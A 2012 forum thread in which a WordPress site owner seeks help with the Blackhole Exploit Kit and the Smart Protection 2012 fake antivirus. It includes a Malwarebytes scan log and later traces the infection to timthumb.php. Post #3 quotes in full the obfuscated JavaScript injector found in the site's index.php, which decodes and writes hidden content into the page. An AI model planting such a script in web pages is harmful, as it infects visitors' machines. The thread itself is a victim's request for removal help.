Jump to content


Photo

Blackhole Exploit Kit (type 2115)/Smart Protection 2012


  • Please log in to reply
8 replies to this topic

#1 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 16 February 2012 - 10:17 PM

I can find very little info on Blackhole Exploit Kit (type 2115). It appeared after I got a pop-up on my web site offering Smart Protection 2012 (spoof AV malware) and warning of dozens of infections, which I didn't run. Does anyone have any info on removing it?

I am now getting malicious obfuscated scripts inserted in my WordPress php files, e.g. index.php. As quick as I edit them they reappear. My hosts have run various scan on my VPS and we thought we had all the culprits. Obviously not. It also seems that my PC is getting re-infected, in spite of all clears:

Malwarebytes Anti-Malware 1.60.1.1000
www.malwarebytes.org

Database version: v2012.02.09.07

Windows 7 x64 NTFS
Internet Explorer 8.0.7600.16385
Bruce :: WORK-PC [administrator]

09/02/2012 23:25:06
mbam-log-2012-02-09 (23-25-06).txt

I also run TalkTalk's suite by F-Secure.

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 201679
Time elapsed: 3 minute(s), 8 second(s)

Memory Processes Detected: 1
C:\ProgramData\F4D55EFF00015B2B0004361DA6014588\F4D55EFF00015B2B0004361DA6014588.exe (Trojan.FakeAlert) -> 4020 -> Delete on reboot.

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Protection 2012 (Trojan.FakeAlert) -> Quarantined and deleted successfully.

Registry Values Detected: 1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce|F4D55EFF00015B2B0004361DA6014588 (Trojan.FakeAlert) -> Data: C:\ProgramData\F4D55EFF00015B2B0004361DA6014588\F4D55EFF00015B2B0004361DA6014588.exe -> Quarantined and deleted successfully.

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 1
C:\ProgramData\F4D55EFF00015B2B0004361DA6014588\F4D55EFF00015B2B0004361DA6014588.exe (Trojan.FakeAlert) -> Delete on reboot.

(end)

Can anyone tell me if the site is infecting my PC or vice versa? Given much of the problem is definitely on the server, I can't supply the usual reports you require, AFAIK. What info can I provide to assist?

I have attached the reports from my PC

Thanks in advance.

Attached Files


Edited by Esinem, 16 February 2012 - 11:08 PM.


#2 sempai

sempai

    3 stars and a sun

  • Admin
  • 1,043 posts

Posted 17 February 2012 - 05:44 PM

Hi,

Is this an office or business computer?

#3 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 17 February 2012 - 08:14 PM

Here's what it inserts in index.php

<
CODE
script>var a='';var b='a3t.tmddri5g%e%%%%22Aaeh6c2%%32d%iir0wvf3%32%h2r%%a30%/l/p8t232D0e2fe%%s..3ret2t2o2CEr%twsai6tw2i5mDEefchwirF2D02e2a33mmDpaae%iud%h2b233Cs2/ai%3%%D0%fr2r%23tmpDe%h2%%r0/ ';var c='1382650749';for(var i=0;i<17;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*17)+i);document.writeln(unescape(a));</script>


#4 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 18 February 2012 - 12:21 AM

My home PC and on a web site I run. I see another poster has this problem. This seems to be a new variant with little info as yet :-(

#5 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 18 February 2012 - 11:35 AM

My hosting company just did another scan and only found infection in a.php. I am hoping this is what has been reinfecting it and all is well now. I hope this helps others

#6 sempai

sempai

    3 stars and a sun

  • Admin
  • 1,043 posts

Posted 18 February 2012 - 06:14 PM

Thank you for letting us know.

#7 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 18 February 2012 - 08:01 PM

If I get any more intel on this I'll let you know. So far so good but there was a delay of several hours between reinfections last time. Security has been beefed up...fingers crossed.

#8 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 28 March 2012 - 08:20 AM

Eureka! The infection hides in a timthumb.php file and appears to be uploaded via FTP. It then infects index.php with obfuscated code which redirects your site or whatever.

This pages tells you how to sort it out: http://codegarage.co...-vulnerability/ They also have a WordPress plugin that seems to work

#9 Esinem

Esinem

    Active Member

  • Active Members
  • 16 posts

Posted 28 March 2012 - 08:22 AM

Eureka! The infection hides in a timthumb.php or thumb.php files and appears to be uploaded via FTP. It then infects index.php with obfuscated code which redirects your site or whatever.

This pages tells you how to sort it out: http://codegarage.co...-vulnerability/ They also have a WordPress plugin that seems to work